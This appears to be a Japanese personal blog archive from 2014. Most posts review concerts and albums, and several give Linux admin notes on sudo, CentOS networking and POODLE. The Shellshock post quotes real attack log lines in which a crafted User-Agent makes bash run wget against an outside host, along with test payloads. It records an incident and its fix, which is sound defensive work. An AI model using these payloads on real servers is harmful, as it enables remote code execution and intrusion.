2014/12/23

the HIATUS 「Closing Night - Keeper Of The Flame Tour 2014」 @ 日本武道館


the HIATUS初日本武道館

きっと無いと思ってたし、
やったら絶対最高のライブになるのも分ってた。

俺たちは待っていたけど、
大きい会場は好きじゃない、似合わないよという細見さんのポリシーも良いと思うし、
俺も大きい会場はあまり好きじゃない。

ライブが始まりだして真っ先に思ったのは、大きい会場にHIATUSの曲がメッチャあうじゃん!。
このライブに参加できた事を本当に誇りに思うし、ありがとうといいたい。

ライブの内容は初期曲から最新曲までまんべんなくお祭り騒ぎだし、
手話を取り入れるなんて新試みとか、これが全く違和感ない。凄い。
まだまだ満足も、前進をやめない姿勢とか、
いちいちかっこよかったです。

今年のベストアクトにダントツでなりました。
手話の方と一緒に歌った「Horse Riding」がキラッキラに輝いていて
あらためてこの曲のもつパワーに圧倒されました。



01.Interlude

02.Roller Coaster Ride Memories

03.The Ivy

04.The Flare

05.My Own Worst Enemy

06.Storm Racers

07.Centipede

08.Monkeys

09.Deerhounds

10.Bittersweet / Hatching Mayflies

11.Superblock

12.Horse Riding

13.Tales Of Sorrow Street

14.Souls

15.Thirst

16.Unhurt

17.Lone Train Running

18.Something Ever After

19.Insomnia

20.紺碧の夜に

21.Ghost In The Rain

22.Twisted Maple Trees

23.Silver Birch

24.Waiting For The Sun

Horse Riding - Horse Riding - Single

Keeper Of The Flame
Keeper Of The Flame
posted with amazlet at 15.01.02
the HIATUS
ユニバーサルミュージック (2014-03-26)
売り上げランキング: 4,057



2014/12/13

phatmans after school / さよならスペースシャトル


最近になってすごく注目され出してきましたね。
来年ヒットするバンドナンバー1なんていわれつつありますね。

ニューアルバムはCD+ライブCD版を買いましたが、
入門にはすごくよく、これは売れるなと思わせるクオリティです。

ミニアルバムから知っている人からすると
昔の曲の再録が多いので、少し残念でしたが、アルバムの表題曲にあるように
この曲のだけでも聴く価値ありです!

ミニアルバムの曲の中にもまだまだ良い曲がたくさんあるので、
フルアルバムで満足せずにぜひこれを機会にしてください。

売れ線バンドになるのはうれしいですが、
「東京少年」のイメージが崩れないよう今のまま頑張ってほしいですね。


さよならスペースシャトル - セカイノコトハ


セカイノコトハ (初回限定盤B) CD+LIVE CD
phatmans after school
トイズファクトリー (2014-12-03)
売り上げランキング: 1,595


2014/12/07

藍坊主 @ 新木場STUDIO COAST


aobozu LIVE 2014 ~蚕の鼓笛、繭は踊る~

今年もきました藍坊主式忘年会

今年のhozzyは喉の調子がすごく悪い
最近あまりなかったのですっかり不安定だったのを思い出しました。

しかしそれを上回る懐かしい、うれしい曲の連続!
新曲やPV演出等、やっぱりお祭りに答えてくれるライブでした。

〆の曲がなんだか一番印象にのこっています。

01.ESTO
02.瞼の裏には
03.グッドパエリア
04.コイントス
05.ポランスキーナ
06.Lumo
07.柔らかいローウィン
08.向日葵
09.羽化の月
10.夏の銀景
11.水に似た感情
12.氷に似た感応
13.バタフライ
14.宇宙が広がるスピードで
15.オレンジテトラポット
16.鞄の中、心の中
---
17.オーケストラ
18.名もなき詩 [Mr.Children]
19.春風
---
20.Love & Peace
バタフライ - ココーノ


ココーノ (初回盤 2CD+DVD)
ココーノ (初回盤 2CD+DVD)
posted with amazlet at 14.12.13
藍坊主
トイズファクトリー (2014-12-10)
売り上げランキング: 162


2014/11/29

Base Ball Bear @ ZEPP Diver City


BaseBallBear 29歳最後のライブ

今年2度目のBBB!
失礼かもしれないが、こんなに大きい箱が似合わないバンドも珍しい。
曲のスケールは凄くいいしんだが、

ライブパフォーマンスが凄くニッチ!
そこがベボベらしくて良くて、ベボベのライブの楽しみでもある。
特に今回はアルバムに基づき丁寧にライブが作られています。

今回のアルバムがすごく好きで、
何度も何度もライブに行きたくなってしまいます。

もう青春ぽい無亜k氏のままではいられないというMCもあったけど、
変わらないものもないし、変わらないものもあるでしょう。

しかしファンファーレが聞こえない。
01.何才
02.アンビバレントダンサー
03.PERFECT BLUE
04.そんなに好きじゃなかった
05.STAND BY ME
06.Ghost Town
07.17才
08.スクランブル
09.方舟
10.The End
11.changes
12.CRAZY FOR YOUの季節
13.UNDER THE STAR LIGHT
14.光蘚 15.魔王
--
16.ELECTRIC SUMMER 17.カナリア


Changes - changes - EP



二十九歳(初回限定盤)(DVD付)
Base Ball Bear RHYMESTER
ユニバーサル ミュージック (2014-06-04)
売り上げランキング: 23,046


2014/11/22

tacica @ 高崎CLUB FLEEZ


今年2度目のtacica

シングルLEOがあまりに好きすぎて参加したシングルツアーです。

MCでも言っていたんだけど、
シングルツアーはアルバムのツアーと違って縛りがないから色んな曲を選べる。

シングルのツアーは本数が少なかったりする事もあって、
あんまり参加したことが無いんですが、いいもんですね!
シングルツアーだから曲の幅が自由だし、プレイが自由でした。

途中、「人生みたい」という?下りがあって思ったんですが、
tacicaってそういう過去から今をつなぐようなそんな曲が多い印象があります。

色々タイアップしているのにいまいち人気に発火しなくてやきもきしますが、
今後も素敵な曲を期待しています。

ちなみに、
ライブ恒例のグッズ紹介はベースの小西さんが担当しています。
相変わらずみんなタドタドしいtacicaというのは変わりません(笑)。




LEO - LEO - Single


LEO
LEO
posted with amazlet at 14.11.22
tacica
SME (2014-09-10)
売り上げランキング: 12,139


2014/11/15

KNOT FEST @ 幕張メッセ

ダークカーニバルに行ってきたよ!
KNOT FEST JAPAN 2014

FESの第一回目に参加するのは人生初だったので、
そのテンションもありながら、天気も良くて最高の1日でした。

参加したのは1日目の11/15日。
そこにポップは無かったよ、黒塗りのシャツに、重いサウンドとパワープッシュの客
暴れて、踊って頭ふって1ライブも抜きを許さないすげーパフォーマンスでした。

あんまりラウドだパンクだメタルだは聞かない方なんだけど、
これはコアファンがいる理由が分かりますわ。
脳汁が汗と一緒に出るような爆発感がたまりませんね。

PapaRoach
LIMP BIZKIT
Slipknot

この辺の鉄板感は凄かったです。
LIMPのライブはCDからじゃ伝わらないかっこよさだったし、
Slipknotのパフォーマンスは日本では真似できない、最高のセットリストでした。

明日は首の筋肉痛だね!

残念だったのは、1っ回目だったからかな?
物販に3時間かかるような売り場の状況や、オフィシャルバーの店員が
酒造りがたどたどしかったり、次回も来てほしいから、頑張ってほしいです。



The Devil In I - .5: The Gray Chapter (Special Edition)


.5:ザ・グレイ・チャプター(2CDスペシャル・エディション)
スリップノット
ワーナーミュージック・ジャパン (2014-10-15)
売り上げランキング: 275



2014/11/09

Northern19 @ LIQUIDROOM



Northernワンマン!

なんだかんだNorthernは初参加です。
今までなんだかんだ縁がなく、見れなったNorthernですよ!

ライブはしっかり満員(?)
アルバムや曲から受けるイメージがどのようなライブを作るのかすごく楽しみでしたが、
やっぱりね!と言いたくなる、イメージ通りの楽しさにあふれたライブでした。

バンドも、お客も一体となって楽しんでいる。
それがダイレクトに伝わりあう凄くいいライブでした。

本当に曲たちから受けるイメージ通りです。
意外だったのはこうゆうバンドのライブに多い、
テンション上がりすぎて周りに迷惑かけたり、サークル連発しまくるみたいのが少なかったこと。
なんかこの辺からも会場全体でライブを作っているような、いいライブでした。

いいね、笑顔が素で出てくるライブは何度でも、いつまでも参加したくなります。

01.START AGAIN
02.WINDING ROAD
03.BRAND-NEW
04.DIVE
05.WE'LL BE ALRIGHT
06.THE DEPARTURE
07.HEARTBREAKER
08.TRYOUT
09.Q
10.BLOWIN'
11.FACE TO FACE
12.SOS
13.MOURNING RAIN
14.WISH
15.DON'T GO AWAY
16.HATE YOU
17.DEVIL'S FOOD
18.SNOWBLIND
19.YES, I CAN FLY
20.BLUE SKIES, BROKEN BIKE... SAME FAVORITE SONGS
21.TONIGHT, TONIGHT
22.THE NIGHT WITHOUT A STAR
23.FOOLS LIKE ME
24.HAPPY ENDING MOTION PICTURE
25.MORATORIUM
26.TRUTH
27.SMILE FOR PEACE
28.STAY YOUTH FOREVER
29.HELLO GOOD-BYE
30.GLORIA
-- アンコール1 --
31.GO
32.BELIEVE SONG
33.NEVER ENDING STORY
-- アンコール2 --
34.SUMMER
35.START AGAIN
SMILE FOR PEACE - SMILE


DISCOVERY(DVD付)
DISCOVERY(DVD付)
posted with amazlet at 14.11.10
Northern19
WIRED ReCORDS (2014-06-25)
売り上げランキング: 42,497



2014/11/08

SPECIAL OTHERS ACOUSTIC / LIGHT


最近私にとってスペアザの季節がやってまいりました。
大分遅いですが。

やっぱりというか、アコースティックもスペアザにはバシッとはまる
なのに新鮮さが来るという、幸福感です。

エレクトリックの疾走感もあり、アコースティックの優しさもある。
なんか無限に聞いていられそうになるくらい、好きです。


LIGHT - LIGHT


LIGHT(初回限定盤)
LIGHT(初回限定盤)
posted with amazlet at 14.11.08
SPECIAL OTHERS ACOUSTIC
ビクターエンタテインメント (2014-10-08)
売り上げランキング: 608



2014/10/19

ShellShock bashコマンドインジェクション

これは凄い!

GNU Bash に OS コマンドインジェクションの脆弱性

bash の脆弱性対策について(CVE-2014-6271 等)


GNU Bash には、環境変数にシェル関数定義を設定して他のシェルプロセスに渡す機能と、環境変数で設定されたシェル関数定義を取り込む機能が存在します。関数定義に続きシェルコマンドが記述されている形で環境変数が設定されているとき、GNU Bash は関数定義を取り込む際にそのシェルコマンドを実行してしまいます


たぶんある程度しっかり作られたアプリケーションのサイトや、
最新のパッケージを使っている環境ではあまりこの影響の脆弱性をうけるサイトは少ないのかなという印象です。

私が管理しているサイトでは脆弱性の再現は1サイトしかありませんでした。

テストは簡単に、ChromeやFireFoxのユーザーエージェントを指定できるプラグインで、
env x='() { :;}; echo vulnerable' bash -c "echo this is a test"
のような値を設定してサイトを回遊ました。

ちなみに、実際に攻撃が成功してしまった環境はちょっと古いOS 5系の環境。
  • Cent OS 5
  • Apache 2.2 標準RPM
  • PHP 5.3 ソースインストール
実際にきていた攻撃は下記のようなアクセス。
62.210.75.170 - - [30/Sep/2014:07:42:45 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1281928
62.210.75.170 - - [30/Sep/2014:07:42:52 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c 'wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1232626
62.210.75.170 - - [30/Sep/2014:07:42:59 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1227358
62.210.75.170 - - [30/Sep/2014:07:43:01 +0900] "GET /index.html HTTP/1.1" 200 4872 "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" "() { :; }; /bin/bash -c '/usr/bin/wget http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA== >> /dev/null'" 1247845
実際に攻撃が成功すると、下記のようなメッセージがsyslogに出力されました。

Sep 30 07:42:23 GSA040014009 kernel: sh[26924]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff1f9b5610 error 4
Sep 30 07:42:23 GSA040014009 kernel: sh[26926]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff3edfcdb0 error 4
Sep 30 07:42:26 GSA040014009 kernel: sh[26928]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff3f09fb50 error 4
Sep 30 07:42:26 GSA040014009 kernel: sh[26930]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff22324de0 error 4
Sep 30 07:42:27 GSA040014009 kernel: sh[26932]: segfault at 0000000000000000 rip 00000000004373c7 rsp 00007fff880e3000 error 4
メモリのセグメンテーションエラーね。
そしてApacheのエラーログには親切に下記ログも
/bin/sh: wget: No such file or directory
/bin/sh: wget: No such file or directory
/bin/sh: wget: No such file or directory
--2014-09-30 07:42:38--  http://creditstat.ru/Y3Vwbm9vZGxlcy1tdXNldW0uanBTaGVsbFNob2NrU2FsdA==
Resolving creditstat.ru... 78.46.37.177
Connecting to creditstat.ru|78.46.37.177|:80... connected.
HTTP request sent, awaiting response... 404 Not Found
2014-09-30 07:42:38 ERROR 404: Not Found.
見事動作させられてますね、ありがとうございます。
他にはmailコマンドを実行させられたり、「/tmp」領域にファイルを配置されたり。
今回はユーザーエージェントにコードをセットされていたから分かりやすかったですが、
Cookieや他にログに残らないようなアクセスだと、なかなか検知は難しかったかもしれないですね。

実際どこに実行箇所があったかというと、HTML内に記述していた
<!--#exec cgi="~" -->
上記部分でした。
Apacheで"IncludeNOEXEC"していれば防げていたかもしれませんが・・・

対応策はBashのアップデートを上げるしか基本的には無いので、もちろんアップデート。
アップデートした場合、OSの再起動が必要なのか、いらいないとか。
ここはRedhatの情報に従って確認していきましょう。

特殊な細工がされた環境変数による Bash コードインジェクションの脆弱性 (CVE-2014-6271、CVE-2014-7169)

Bash変数を設定して起動しているサービスが無いか確認。


エクスポートされた Bash 機能を使用している場合は、影響を受けるサービスを再起動することが推奨されます。影響を受けるインタラクティブなユーザーが再ログインしたり、画面または tmux セッションを再起動したりする必要があるかもしれません。
これらの問題を修正するために提供された Bash アップデートは、この環境でエクスポートされた関数の名前を変更します。古いバージョンの Bash が関数をエクスポートしている場合、その関数はアップデート後に新しく起動した Bash プロセスでは認識されないため、定義されていない状態になります。サービスを再起動すると、新しいバージョンの Bashは、期待した名前で関数をエクスポートするため、再度表示されます。


# grep -l -z '[^)]=() {' /proc/[1-9]*/environ | cut -d/ -f3

とはいえ、変数が空になって後で上手く動いていないことが分かるのはやなので、
私の場合は再起動しました。

アップデート後はそれぞれの脆弱性が修正されている事を確認。
CVE-2014-6271

# env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `x'
bash: error importing function definition for `BASH_FUNC_x()'
test
RHSA-2014:1306、RHSA-2014:1311 および RHSA-2014:1312
# env 'x=() { :;}; echo vulnerable' 'BASH_FUNC_x()=() { :;}; echo vulnerable' bash -c "echo test"
bash: warning: x: ignoring function definition attempt
bash: error importing function definition for `BASH_FUNC_x'
test
CVE-2014-7169
# cd /tmp; rm -f /tmp/echo; env 'x=() { (a)=>\' bash -c "echo date"; cat /tmp/echo
date
cat:/tmp/echo:No such file or directory
以上で対応自体は完了。アップデートするだけの簡単な作業ですね。

今回の脆弱性はサイト上に問題が無くても、対象であればアップデートしたほうがいいでしょう。
今回の対応で面倒だったのは「もしも」の場合に備えて今のバージョンと同じパッケージを探しておくことでした。
OS6系ならまだまだ大丈夫ですが、5系はもう古いのはないですからね。
当時のメディアがあってよかった。

入門bash 第3版
入門bash 第3版
posted with amazlet at 14.10.18
Cameron Newham Bill Rosenblatt
オライリージャパン
売り上げランキング: 369,620

2014/10/18

ストレイテナー / 冬の太陽


来た!

アルバムを前にすげぇ曲が来ましたね。
なんだかテナーっぽくないような、あれ?変わったかな?って気がするけど、
聴き終わるとテナーっぽい、最高の爽快感と、しびれるようなかっこよさ!

LOW IQ 01のアニバーサリーライブで聞いた時も鳥肌もんだったし、
MCで「かっこいっしょ?」って。しっているよ。最近ずっと聞いてるよ!

歌詞やメロディはどこか物悲しいのに、体が動かずにはいられない。
ライブでは一緒に叫ばずにはいられませんでしたね。


冬の太陽 - 冬の太陽/The World Record - EP


冬の太陽/The World Record(初回限定盤)(DVD付)
ストレイテナー
ユニバーサル ミュージック (2014-09-17)
売り上げランキング: 1,639



POODLE: SSLv3.0 脆弱性めも


いえい!深刻な脆弱性が多いぜ!

SSLv3 プロトコルに暗号化データを解読される脆弱性(POODLE 攻撃)
SSL v3 をサポートするプログラムは、中間者攻撃が可能な環境で、
Padding Oracle On Downgraded Legacy Encryption (POODLE) 攻撃の影響を受ける可能性があります。

SSL v3 プロトコルに対して、中間者攻撃により通信内容を解読する攻撃手法が報告されています。この攻撃手法は "POODLE" (Padding Oracle On Downgraded Legacy Encryption) と呼ばれています。

ウェブブラウザ等のプログラムの多くでは、上位のプロトコルで通信できない場合にプロトコルのバージョンをダウングレードして通信を行う機能 ("protocol downgrade dance") が実装されています。中間者攻撃(Man-In-the-Middle Attack) を通じて POODLE 攻撃を行う際には、この機能を悪用して SSL v3 による通信を行わせるように仕向けます。その後、SSL v3 でブロック暗号のCBCモードによる暗号化が行われている通信に対し、通信内容を解読します(パディングオラクル攻撃の一種)。現実的な攻撃シナリオとして、HTTP Cookie などの情報を取得する方法が挙げられています。

ふむ。

まず自サイトが対象なのかを確認。
詳しくはRedHatさんから教えていただきましょう。
POODLE: SSLv3.0 脆弱性 (CVE-2014-3566)

openssl s_client -connect "${`hostname`}:443" -ssl3
ホスト名のところを対象のサイトURLにして、アクセスします。
アクセス後、errorやwarningが出ずにサイトの証明書情報等が表示されたら有効化されていることになる。

if echo "${ret}" | grep -q 'Cipher.*0000'; then
    echo "SSLv3 disabled"
  else
    echo "SSLv3 enabled"
 fi

以前からSSLv3は安全でない暗号化方式であったため、
OpenSSLのソースパッケージはパッチをあてたものを公開していますが、
今後どのメーカーもそのような対応をするかは微妙なところです。

SSLv3を無効化した場合、どの程度に影響があるのかな?
古いフィーチャーフォン端末と、WindowsXPのIE6環境で実害が出るようです。

Docomoの場合
https://www.nttdocomo.co.jp/service/developer/make/content/ssl/spec/index.html
au KDDIの場合
http://www.au.kddi.com/ezfactory/web/
SoftBankの場合
http://creation.mb.softbank.jp/mc/tech/tech_web/web_ssl.html

auはちょっとTLSに対応しているのか情報があやふやですが、SHA2対応したときにアップデートしているらしいです。

そもそもSSL通信の際、どのような優先順位なんでしょうか。
SSL (Secure Sockets Layer) ハンドシェイクの概要
Cipher Suites in Schannel

SSLv3が選択肢にくるのは相当後ろですね。
今世の中的にはSSLv3はほぼ利用されていないというのが現状のようです。

しかし、ApacheでSSLサイトを立てようつすればデフォルトではSSLv3は有効になっているのが現状です。

今回の脆弱性自体は攻撃方法がそれほど簡単でもなく、まだ目立って攻撃が活発でもありません。
なのでメーカーによっては対応はそれほど活発でもないし、IPAもまだ発表はしていません。

しかし暗号化問題は「すみません、中身見られてました」では済まないことが多いので、
SSLv3を無効化することで対応可能なのであれば、してもよいレベルと思います。
今主流の暗号化プロトコルに問題が見つかったわけではないのですから。
モバイルサイトを運用している方は簡単には決められない事と思いますが。

ちなみにApacheでSSLv3を無効化する方法は簡単。

 SSLProtocol All -SSLv2 -SSLv3
設定ファイルに追記するだけですね。
RedHhatは下記のように案内していることからも、今後は標準パッケージでは無効化されてくるかもしれませんね。

Red Hat は、この問題と、今後の SSL 脆弱性の影響を受けないように、SSL および TLS 暗号化を提供する SSLv3 を無効にすることを推奨します。

SSL/TLS導入ガイドブック
SSL/TLS導入ガイドブック
posted with amazlet at 14.10.18
井上 孝司 三木 秀治
毎日コミュニケーションズ
売り上げランキング: 191,638

2014/10/06

04 limited sazabys / swim


やっぱり俺はメロコアが好き!

ええんやで。
この王道感、ロックだなーって感じ。久しぶりにきたよ。
今もう音楽性がある程度固まっているってのも凄いね、
自分たちの武器を最大限にたたきつけてくる。

今後絶対人気出てくると思う(出てほしい)
ライブ行きたい!

[Alexandros]とか好きな人は結構はまると思います。


04 Limited Sazabys


YON(初回限定盤)(DVD付)
YON(初回限定盤)(DVD付)
posted with amazlet at 14.10.05
04 Limited Sazabys
No Big Deal Records (2014-09-03)
売り上げランキング: 10,057



2014/10/04

LOW IQ 01 15th Anniversary Special Party "MASTER OF MUSIC" @ 新木場STUDIO COAST


最高の時期に、最高のタイミングで、最高の夜を。

台風がちょうど1日ずれて良かった。
天気的には爽やかに!とはいかなかったけど、
今日の熱さを冷やしてくれるちょうどいい感じでした。

なかなかアニバーサリーにこんな豪華なメンツが集まることってすごいと思う。
the phillowsの時も思ったけど、まだまだ若手には譲らせねーよ。

だって10-FEETで、ストレイテナーで、LOW IQ 01っすよ
10-FEETが前座でテナーが繋ぎですよ。
もう二度とこんな夜は来ないし、忘れさせねーよ!っていう鬼の4時間ライブでした。

10-FEET
ストレイテナー
  01.Melodic Storm
  02.BERSERKER TUNE
  03.The World Record
  04.Super Magical Illusion
  05.SIX DAY WONDER
  06.冬の太陽
  07.シンデレラソング
  08.DISCOGRAPHY
  09.From Noon Till Dawn
LOW IQ 01 & MASTER LOW
  01.LITTLE GIANT
  02.CHANCES
  03.T・O・A・S・T
  04.Day to Day
  05.SWEAR
  06.NEVER SHUT UP
  07.And...
  08.DIS IT
  09.A.A.A. (Again And Again)
  10.SO EASY
  11.MIRACLE
  12.RULES
  13.YOUR COLOR
  14.WHAT'S BORDERLESS?
  15.F.A.Y.(Fight Against Yourself)
  16.五日はまた雪 (More Speed Ver.)
  17.WAY IT IS
  18.NEW THINGS
----------------------------------
  19.831
  20.MAKIN' MAGIC
----------------------------------
  21.NO SHAME
  22.FIREWORKS
  23.Hangover Weekend

Shed Your Skin - Yes, LOW IQ 01


Shed Your Skin
Shed Your Skin
posted with amazlet at 14.10.05
cutting edge (2014-04-23)
売り上げランキング: 288,147



2014/09/21

グッドモーニングアメリカ / 未来へのスパイラル


最近の若いバンドを見ていて、メディアに取り上げられるようなバンドが
なんかサブカル化を強めているような、

印象に残るんだか残んないんだかわからないバンド名や
流行語のような単語や社会感を並べた歌詞があんまり好きになれない。

学生バンドならわかるけど、
詩の世界観があまり好きになれない。

せっかくいい音楽を鳴らしてそれじゃ一時の流行曲と変わらないよ。

そんな感じでグッドモーニングアメリカと出会ったんだけど、
メロディは抜群に好きです、乗りやすいし、絶対盛り上がるでしょって!
カラオケで歌うと最高にすっきりする!

今後の詩世界がどんな風に成熟していくのか楽しみ。


未来へのスパイラル - 未来へのスパイラル


未来へのスパイラル(初回盤)
グッドモーニングアメリカ
日本コロムビア (2013-05-08)
売り上げランキング: 20,712



2014/09/14

sudo関連のあれこれ


enter image description here

この前までredhat/CentOs 6系が出たばっかりだと思っていたら、
もう7系が出て新しい仕組で騒がれていますね。
でもまだまだ安定版として、サービスで利用できるようになるのは来年かなという気がしますので、
引き続き6系のナレッジをメモリましょう。
今回はsudoです。言わずと知れず、やりたいことは大体できるといわれているsudoらしいですが、
私は少しデフォルトから手を加える事が多いです。

sudoのパスワードキャッシュを制限

sudoはデフォルトでパスワードの認証情報を5分間保持しますので、それを無効化。
# visudo
Defaults timestamp_timeout = 0

認証リトライ回数を制限

sudoのデフォルト認証リトライ回数は3回、3回でいいとは思いますが、変更する場合は下記。
# visudo
Defaults passwd_tries = 3

ログ出力先の変更

redhat/CentOSではデフォルトでsecureログに出力されますが、ガッツリsudoを利用して、
内容をしっかりログに出したいときは、下記のように設定。
# visudo
Defaults !syslog, logfile = /var/log/sudo.log, log_year
sudoを行うと、下記のようなログが指定のログに出力されます。
# view /var/log/sudo.log
Aug 15 12:43:19 2014 : hogehoge : コマンドが許可されていません ;
TTY=pts/2 ; PWD=/var/www ; USER=root ;
COMMAND=/bin/rm -rf html/
Aug 22 21:23:13 2014 : root : TTY=pts/2 ;
PWD=/var/www ; USER=apache ;
COMMAND=/bin/uname

sudo設定ファイルの外部ファイル化

sudoの設定を外部読み込みファイルのように利用したい場合。
ユーザー個別の設定なんかはこちらに書き出します。
まず外部ファイルが有効かされている事を確認。
# visudo  
#includedir /etc/sudoers.d
外部ファイルの作成。
# visudo -f /etc/sudoers.d/hogehoge
ファイルを作成する際に、構文チェックももちろん、パーミッションチェックも行ってくれます。

コマンド制限

当然sudo権限を与えるのだから、コマンドを制限したいですが、コマンドのオプションまで制限したいですよね。
デフォルトでコマンドを記述しただけではすべてのオプションが許可するようですが、
オプションまで記述することで、コマンドの構文レベルで制限することも可能です。
# visudo -f /etc/sudoers.d/hogehoge
hogehoge ALL = (root) PASSWD: /bin/su - homehome, /bin/su homehome
スイッチできるユーザーを制限したい場合なんかに便利かもしれません。
正規表現も使えます。



sudoやsudoersのmanページを見てると、もっと色々細かいことが制御可能です。
ただ、懲りすぎて何とも使いにくいシステムにならないよう程々がいいと思います。


Linuxシステム[実践]入門 (Software Design plus)
沓名 亮典
技術評論社
売り上げランキング: 51,386

Linuxサーバを作る ②


前回、OSのインストールが終わり、いよいよ設定です。
まず作業がしやすいように接続環境を整えましょう。

ネットワークの設定


6系からネットワーク周りの設定はNetworkManagerでの管理が推奨されています。
でもGUIでゴニョゴニョしたりしなければいけなかったり、まだまだサーバとしてはどうなの?
という所があります。

ここではべたに設定ファイルを直接編集して設定を行っていきます。

NICの設定


環境によりますが、ここはサーバ目的なので固定IPを設定していきます。
まだここではターミナル接続です。

minimalでインストールすればNetworkManagerはインストールされませんが、
標準でインストールした場合、インストールされている場合があるので、まず停止します。
# service NetworkManager stop
そして、今後ももちろんファイル編集でネットワーク設定を行うため、万が一ファイルがNetworkManagerで管理されないよう、
NIC側でも無効化しておきます。
# vi /etc/sysconfig/network-scripts/ifcfcg-eth0
NM_CONTROLLED=no
インストール時にネットワーク設定を行った場合は設定されていますが、
スキップした場合、インターフェースはデフォルトで無効化されてるため有効化します。
# vi /etc/sysconfig/network-scripts/ifcfcg-eth0
ONBOOT=yes
サーバのIP情報を固定で設定。
# vi /etc/sysconfig/network-scripts/ifcfcg-eth0
BOOTPROTO=none
IPADDR=192.168.154.11
PREFIX=24
少し前ではサブネットマスクで記述していましたが、最近はPREFIXでの記述が推奨されています。
また、デフォルトゲートウェイで利用するNICには下記設定を追記。
# vi /etc/sysconfig/network-scripts/ifcfcg-eth0
DEFOROUTE=yes
またNICのハードウェアアドレスやUUIDの記述がありますが、実際にはこのファイルでは管理されておらず、
仮想環境を利用している場合、邪魔になることもあるのでコメントアウトしておきましょう。
# vi /etc/sysconfig/network-scripts/ifcfcg-eth0
#HWADDR=*************************
#UUID=************************
設定を反映。
# service network restart
インターフェース eth0 を終了中:                            [  OK  ]
ループバックインターフェースを終了中                       [  OK  ]
ループバックインターフェイスを呼び込み中                   [  OK  ]
インターフェース eth0 を活性化中:
eth0 のIP情報を検出中... 完了。
                                                           [  OK  ]
設定値の確認。
# ifconfig
eth0      Link encap:Ethernet  HWaddr 00:0C:29:BE:42:5C
          inet addr:192.168.247.128  Bcast:192.168.247.255  Mask:255.255.255.0
          inet6 addr: fe80::20c:29ff:febe:425c/64 Scope:Link
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
          RX packets:294 errors:0 dropped:0 overruns:0 frame:0
          TX packets:67 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:1000
          RX bytes:48336 (47.2 KiB)  TX bytes:10963 (10.7 KiB)
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          inet6 addr: ::1/128 Scope:Host
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
          RX packets:4 errors:0 dropped:0 overruns:0 frame:0
          TX packets:4 errors:0 dropped:0 overruns:0 carrier:0
          collisions:0 txqueuelen:0
          RX bytes:272 (272.0 b)  TX bytes:272 (272.0 b)
"eth0"が有効化され、きちんと設定されています。

これでリモート接続ができる環境になりましたね。
次からSSH接続して作業を行っていきます。

ネットワーク周りの設定


redhat/CentOSであれば、自動起動でSSHは起動していますので、
この時点ではSSHでrootユーザーからも接続が可能です。
しかし、同じネットワーク帯なら接続できますが、デフォルトでiptablesも設定されているため、
上手く接続できない場合は一旦停止しておきましょう。
※作業サーバが公開されていない事が大前提です。FWの外側、外部からアクセスできる環境にサーバがある場合、不用意には無効化してはいけません。
# service iptables off

ホスト名の確認。
インストール時に設定してホスト名になっていますか?
# cat /etc/sysconfig/network
NETWORKING=yes
HOSTNAME=devos-01
設定したホスト名に特にDNS設定を行わない、完全修飾ドメインで無いのであればhostsに登録します。
# vi /etc/hosts
127.0.0.1   localhost localhost.localdomain localhost4 localhost4.localdomain4
::1         localhost localhost.localdomain localhost6 localhost6.localdomain6
192.168.247.128  devos-01
DNSサーバの設定。
キャッシュDNSサーバを設定します。
内部にキャッシュDNSがあればそこを、無ければGoogleのキャッシュDNSサーバとかでいいんじゃないですかね。
# vim /etc/resolv.conf
nameserver 192.168.247.2

NetworkManagerを利用している場合、NICにDNSサーバの情報を記載します。
NICにPEERDNSの記述がnoで設定してある場合、NICの設定が優先されます。

固定IPを設定する場合APIPAを無効化しましょう。
# vim /etc/sysconfig/network
NOZEROCONF=yes
IPv6の無効化。
今後はどうなんでしょうね?
サービスやネットワークで利用しないのであれば無効化しておきましょう。
# vim /etc/sysconfig/network
IPV6INIT=no
NETWORKING_IPV6=no
IPV4_FAILRE_FATAL=yes
# vim /etc/modprobe.d/dist-ipv6.conf
options ipv6 disable=1

ネットワークを再起動して、設定を反映させましょう。
modprobeの設定は再起動しないとですが、ネットワークの設定変更後にすぐ再起動は少し怖いですからね.
# service network restart

ちなみに、IPアドレスを変更しないでネットワークを再起動した場合、下記のようなメッセージが出る場合あります。
インターフェース eth0 を活性化中:  Determining if ip address 10.96.146.152 is already in use for device eth0...
NIC設定を反映させる際、スクリプトは設定されたIPアドレスが使用可能かどうか、
arpingコマンドによりチェックを行なう処理が入っているらしい。

echo $"Determining if ip address ${ipaddr[$idx]} is already in use for device ${REALDEVICE}..."
